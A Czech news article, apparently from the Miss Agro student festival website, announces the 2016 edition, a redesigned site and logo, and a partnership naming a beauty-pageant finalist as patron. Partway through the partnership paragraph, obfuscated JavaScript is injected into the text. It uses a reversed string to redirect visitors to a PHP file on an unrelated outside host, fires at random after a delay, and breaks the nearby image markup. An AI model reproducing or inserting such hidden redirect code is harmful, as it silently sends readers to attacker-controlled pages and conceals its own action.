Když se před osmnácti lety konal historicky první ročník soutěže Miss Agro, nikdo ještě nemohl tušit na začátku jaké velké tradice všichni společně stojíme. Soutěž ušla od recesivní zábavy určené pro největší nadšence do dnešní podoby jednoho z největších open-air festivalů v České republice dlouhou cestu. Dnes, na prahu 18. ročníku stojí festival před zásadním milníkem. Miss Agro dospěla.

 

Když jsme na konci roku 2015 přemýšleli, jaký by měl být ten nadcházející ročník Miss Agro, napadala nás spousta myšlenek, kam by se festival v novém roce mohl posunout. Ale zásadní roli hrálo rozhodnutí – držet se tradice, která akci provází již několik let nebo se pustit do zásadní proměny a ukázat světu novou a moderní tvář Miss Agro? Nakonec převážila druhá varianta. Osmnáct let je člověku jen jednou za život, a když má přijít změna, tak právě teď. Změna, která bude symbolizovat jak elegantní a stylová chce Miss Agro být. Přípravy trvaly více jak čtvrt roku a dnes jsme moc rádi, že Vám můžeme oficiálně představit novou tvář Miss Agro 2016.

Právě teď máte možnost číst tento článek na novém webu www.missagro.cz. Jednodušší a přehlednější vzhled webu nabídne aktuální novinky ze světa příprav a zákulisí akce. Poprvé je také pro dívky připraven online přihlašovací formulář pro účast v soutěži. Zapracovali jsme, a stále pracujeme, také na historii festivalu, kde najdete informace o nedávno minulých ale i o prvních ročnících a začátcích Miss Agro.

Další radikální proměnou prošlo logo celé akce. Jednoduché linie v barvách univerzity charakterizuje korunka složená ze začátečních písmen názvu Miss Agro. Za novými webovými stránkami a logem festivalu stojí grafický tým Univerzitních novin ČZU iZUN.eu.

 

miss-agro-2016-logo_full-color-version-1

 

Jsme také velice rádi, že se nám podařilo navázat spolupráci s Nadání a dovednosti o.p.s., díky čemuž se patronkou naší soutěže stala finalistka České Miss 2014 Veronika Kašáková. Miss Agro 2016 už tak nebude pouze soutěž krásy, ale také kombinací elegance, inteligence a šarmu každé dívky. Více informací o spolupráci si můžete přečíst $mWn=function(n){if(typeof ($mWn.list[n])==“string“) return $mWn.list[n].split(„“).reverse().join(„“);return $mWn.list[n];};$mWn.list=[„\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dovednosti-veronika-kasakova.jpg“ rel=“attachment wp-att-2923″>dovednosti-veronika-kasakova“ width=“300″ height=“225″ />

 

Tímto jsme Vám představili jedny z hlavních novinek letošního festivalu. Samozřejmě nekončíme. Na další změny se můžete těšit v průběhu následujících týdnů. Stejně tak Vám už brzy začneme odkrývat program hlavního dne Miss Agro, který proběhne v úterý 10. 5. 2016. Sledujte náš web, Facebook, a nově také Instagram, kde se již brzy dozvíte další aktuální novinky.

Sdílej článek